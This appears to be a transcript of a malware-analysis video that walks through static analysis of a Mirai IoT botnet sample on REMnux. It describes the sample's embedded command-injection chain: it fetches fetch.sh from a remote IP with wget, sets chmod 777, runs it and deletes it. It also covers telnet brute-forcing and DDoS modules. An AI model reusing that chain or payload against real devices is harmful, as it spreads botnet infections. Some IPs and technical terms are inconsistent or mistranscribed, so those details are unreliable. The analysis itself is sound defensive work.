Hello everyone. In this video, we analyze a Mirai IoT malware sample step by step on REMnux virtual machine, extracting strings, IPs, URLs, and attack indicators to understand how this malware spreads, executes, and communicates. So let's do it. So today we are going to do some static analysis of Linux executable and linkable format malware sample on this virtual machine called REMnux. So the goal here is to identify what the binary is, how it behaves, and whether it's malicious without executing any malware on this virtual machine. Before we start, let me tell you a little bit about REMnux, which is a Linux-based malware analysis distribution used by security professionals for reverse engineering, static analysis, and dynamic analysis of malicious software. So basically, this machine provides a safe, pre-configured environment with hundreds of tools to analyze malware without infecting your main system. REMnux provides static analysis tools, dynamic analysis helpers, network traffic analysis, memory and artifact analysis, and it has pre-installed digital forensics and incident response tools ready to use, so no manual setup needed. The first thing we need to do before we isolate this virtual machine is to update and upgrade the system. So the next step is to create a main folder called malware-lab with organized subfolders such as samples, analysis, reports, and notes. So we can use those subfolders to store malware samples, hashes, analysis artifacts, detection rules, and investigation results. I have already done this, and as you can see, here is my main folder with subfolders. So then we will download the Zoom malware repository from GitHub using this command right here. So which provides a well-organized collection of real-world malware samples for controlled analysis and research. And finally, before we start working on malware sample, we will isolate the REMnux virtual machine by changing the network adapter to host only. And as you can see right here, I already changed my adapter, and it says host only adapter. So by changing the network adapter, we prevent the malware from communicating with external networks or causing unintended spread during analysis. Okay, let me go back to virtual machine and let's see what we have here. Okay, so we have subfolders analysis, notes, reports, samples, and rules. Okay, let's go to samples, cd samples, and see what's there. Okay, so as you can see, once you download this whole file called master.zip, so the next thing will be to unzip this file, and as you can see, I already have done that. And then now we can go to this directory, the Zoom master, and see what's there. Okay, so here's the directory called malware. Let's go there, malware, and see what's there. So we have binaries and source. So we're going to this directory, binaries, and let's see what is there. Okay, so as you can see here, we have collection of real malware samples. So each folder name represents a malware family or campaign. For example, Linux, Mirai.b, Win32, ransomware, WannaCry, and so on. So those samples kind of cover multiple platforms like Windows, Linux, Android, macOS, then scripts like BAT, VBS, JS, worms, ransomware, APT malware. So those files are used for just educational and research purposes only, not execution. Let me see, where's binary? Okay, here we go. Today we will work on linux.mirai.b sample, this one. So this is a variant of the Mirai botnet malware that infects vulnerable Linux devices, usually IoT devices, and then turns them into remotely controlled bots for large-scale DDoS attacks. So let's open this binary and see what it's inside. Okay, so what we are seeing here are multiple Mirai Linux malware samples, each stored by its cryptographic hash along with checksum files and password protected zip to safely handle the malware. So the next step is to identify and choose a sample for analysis. So we will basically verify the archive and then extract it safely. And as you can see, I have done that, but in order to read the password, you can just type cat linux mirai.b.pass, and once you get the password, in this case it's called infected, then you can just run the next command to unzip the files, unzip -P infected, and then you run linux.mirai.b.zip. -P, it's just basically supplies password so we don't mistype at the prompt. And as you can see, I have extracted files from zip file. The next step will be to confirm integrity using provided hashes. So let's do that. Okay, both commands confirm the zip file's integrity checks passed, meaning the malware sample matches the original hashes and has not been altered. So now let's identify file types. Okay, this confirms we have real Linux ARM binaries, which is IoT targeted Mirai, not placeholder text. So the next step will be to remove execute beat from everything in the Mirai folder. So let's change the mode to -x. So basically we just removed execute permission on all files in this directory. This keeps us from accidentally running the malware. So now we can do again this file and choose one of those files. So I already choose this one, the first one. So basically you can run the next command, cp, copy this file and save it to malware lab/samples, and you can rename this file to mirai.arm. Okay, now let's go back to the main directory, and the next step will be to save the hash output to analysis folder. So we can run this command here quickly, and then we can check the output using cat command. There we go. So the output, hash output, is saved to samples/mirai.arm. Okay, so now we can do some entropy analysis on Mirai binary, running this command here. Okay, so this entropy analysis shows the Mirai binary has moderate entropy of 6.0, meaning it's not fully packed or encrypted, but contains enough variation to suggest compiled code with some obfuscation rather than random or compressed data. Let's go to the next one, and now we can basically extract some printable text from Mirai binary using this command here. So we just extracted all printable text from the Mirai ARM malware binary and save it into a file, kind of creating a string dump for analysis. Let's go to the next one. Okay, so right here, this output shows that the malware contains commands to download and execute a payload from remote service, which is this one right here, 79.124.8.24. This is the IP address. So using basically tools like webget and curl, confirming how Mirai spreads by pulling a script and making them executable and running this script on compromised device. Okay, so the next one will be to extract all IP addresses using this command. Again, so we just extracted all IP addresses from the malware's string data and stored them as a unique IoCs in analysis folder, actually analysis/mirai.arm, and we just saved as a ips.txt. Okay, so now we will just pull out some HTTP and HTTPS links and save them again in analysis folder. So we just pulled HTTP link the malware references and stored them in analysis files as a unique IoCs. Again, using this command, we extracted all URLs from the malware's string data, and then we removed the duplicates and saved them into a clean list for analysis. Okay, now we can search for username and password pairs using the next command, which is this one right here. Okay, so this is associated with routers running BOA web server, which is common in IoT devices Mirai targets. It's often used for password bypass and command injections. And so as you can see, we have here webget command, and we have HTTP IP address 79.124.8.24. So this is a command injection payload. So basically it downloads a script from a remote server, makes the script executable, and then runs this script automatically. So in other words, it's almost certainly a C2 payload host. Let's go to the next one. Just this one. Okay, we have here some strings. Okay, so these strings show Mirai packing a bunch of web exploits and payloads, and then it says crafted HTTP request with the different user agents, and then injects commands like webget again with this IP address right here, and we have kind of changing permissions using change mode 777, and then we also have sh fetch.sh, and we can see here that it's kind of abusing vulnerable web apps to download and run malware. Okay, let's go to this one and look for networking keywords. Okay, so we have some strings here. Okay, so these strings confirm the malware is built to function as a network boot. It opens TCP sockets, connects to remote hosts, sends and receives data, and even includes exploit routines for like different router brands. This is the communication backbone Mirai kind of uses for spreading and controlling infected devices. And we have here like socket / connect / send / receive, which is network communication primitives. And then we have IPv4 plus TCP connections. And then we can see here telnet protocol with port 23, kind of targeting telnet devices for brute force infection. So this kind of confirms that Mirai spreads by abusing telnet ports 23. It can pivot kind of using vendor specific exploit modules, and this sample is ready to scan, exploit, and connect to a C2 server. Okay, we can run the next one, which is command and control C2 behavior. Okay, we got some data here. Again, similar data, but we run the similar string command. So these strings show Mirai's attack engine. So again, it contains built-in modules for launching DDoS attacks like UDP floods, TCP synchronization floods, unknowledge floods, DNS attacks, and GRE packet floods. So this proves the sample is not just a spreader, It's a bot designed to receive commands from a C2 server and execute network attacks. And so those strings, like, they indicate kind of main attack engine code. Again, synchronization flood attack, UDP flooding, TCP packet manipulation attacks, and DNS query amplification or DNS flood activity. Okay, we can run the next one with looking for process hiding and persistence clues. Okay, these strings reveal Mirai's persistence and kill switch behavior. So it scans for slash PROC for processes, kills all other malware or security tools, and interacts with watchdog devices, and finally initialize routines to keep itself running. So this is how Mirai stays active, survives reboot attempts, and takes over the devices. So this means, like, we have some here indicators like slash process slash stat slash process again, CPU info. So this is kind of enumerating system resources like CPU threads for botnet workloads. Then we have killer.c slash kill.c, process killer module to terminate other botnets or antivirus. Then we have OS level kill syscalls to remove competitors. We have startup initiate routines like persistence behavior. And we have bootstrapping the malware's main modules, which is a table underscore initiate slash attack underscore initiate slash scanner underscore initiate. Yeah, you can see right here. Okay, let's see what's the next. We can check some executable and linkable format header using this command right here, readelf. So this header confirms the Mirai sample is a 32-bit ARM executable which is designed for IoT devices. It runs little Indian, uses the system VABI and has a valid entry point, meaning this binary is compiled to run natively on routers or embedded systems, not a normal PC. So key points here, again, it's executable and linkable format 32-bit executable binary. It's built for ARM architecture, IoT hardware. It has entry point of 0 times 8194 where execution begins, the start of the malware logic. Matches most consumer IoT chipsets and contains symbol strings and relocations. Has program header 5, which is code plus data segments mapped into memory right here. Yep. Okay. Let's see now what's inside the binary. Okay, so this section headers show how the Mirai binary is structured. So the .txt section contains the executable code. Then we have our data, which holds strings and hard-coded data, and then we have .data and .bss, which store variables used at runtime, and we have the .initiate sections help initialize the malware when it starts. So this confirms the sample is a complete compiled ARM program built for IoT devices. Okay, let's maybe go over each of those. So initiate, it's code that runs immediately on execution, which is a startup behavior. Text, it's the main malware code, which is logic, exploit routines, and attack modules. Then We have that row data, which is hard-coded strings, again IPS, URLs, credentials, commands, that data, writable variables using during execution, that BSS, runtime memory, buffers, networking state, attack options, and then we have that arm, that executable arm specific exceptions, handling and stack unwind data, and we have that debugging into left in binary, which is helpful for reverse engineering, and we have some that start tab symbol and string tables, function names, and stored text right here. Okay, so what's the next? Okay, so let's run this command and see what happened. So this is kind of just a summary. So we just pulled out the network IoCs from the Mirai binary. These IPS and URLs show where the malware attempts to download payloads and execute commands. They point to possible command and control or staging servers. This is the first step in building an intelligence report on the sample. So what we extracted, so IPS 78.142.18.20 and .24, so which is potential C2 payload server targets used for spreading or updating the botnet. And then we have some URLs commands right here, changing permissions. So these are like infection chain commands. Webget to download the payload, again change mode 777 to make it executable. Then we have sh fetch.sh to run the script immediately, and then we have command remove rm to clean up and hide the tracks. So this is a kind of classic IoT botnet propagation behavior. Okay, let's see what else we have here. So we can confirm these URLs appear like anywhere else using this command. Okay, so we just found this IP address used in multiple payload delivery chains. So it appears everywhere the malware tries to download and execute fetch.sh, which confirms this IP is likely a staging server or command source for the Mirai botnet. So this proves not a random string, it appears consistently. It is used in multiple infection commands. It is linked to exploit payload execution, and it's likely a staging, updated, or C2 distribution point. So repeated references like webget http 79.124.8.24/fetch.sh and changing permission 777 command, and we have sh fetch.sh shows a full execution chain. So download, give permissions, run, and then clean up. So why this matters? This IP can now be treated as an IOC and included in threat intelligence reports, SOC block lists, SIM detections, and CTI enrichment lookups like VirusTotal and Abuse IPDB. Okay, let's move on. Okay, so here we can just extract domain names using this command. Okay, so this command pulled out domain-like strings from the malware. Most results are internal files or code sections, but right here, this one, and web paths like check.cgi, logging.jsp, and
tm.shcmd.jsp point to web exploitation targets the malware interacts with during infection. So what the important entries mean. So this one here, I don't know how to pronounce this thing here. It looks like kind of difficult, but it's a real domain used to redirect or hide traffic, suspicious IOC. Then we have a check.cgi, CGI endpoint, often targeted on vulnerable routers and web appliances. Then we have login.jsp, web admin logging pages used for command injection exploits. Of course, we have fetch.sh, script the malware downloads and executes. And we have java.lang.runtime, Java execution abuse, execution payloads from inside web apps. And finally, let's save everything. Now let's open analysis folder, and as you can see, we have everything saved here. So in this lab, we extracted strings, IOCs, and executable and linkable format metadata from a Mirai malware sample to identify its architecture, infection chain, payload URLs, and attack capabilities, confirming it as an IoT botnet component designed for exploitation and DDoS operations. So this is all for today in this lab. Thank you for watching, and I will see you in my next video.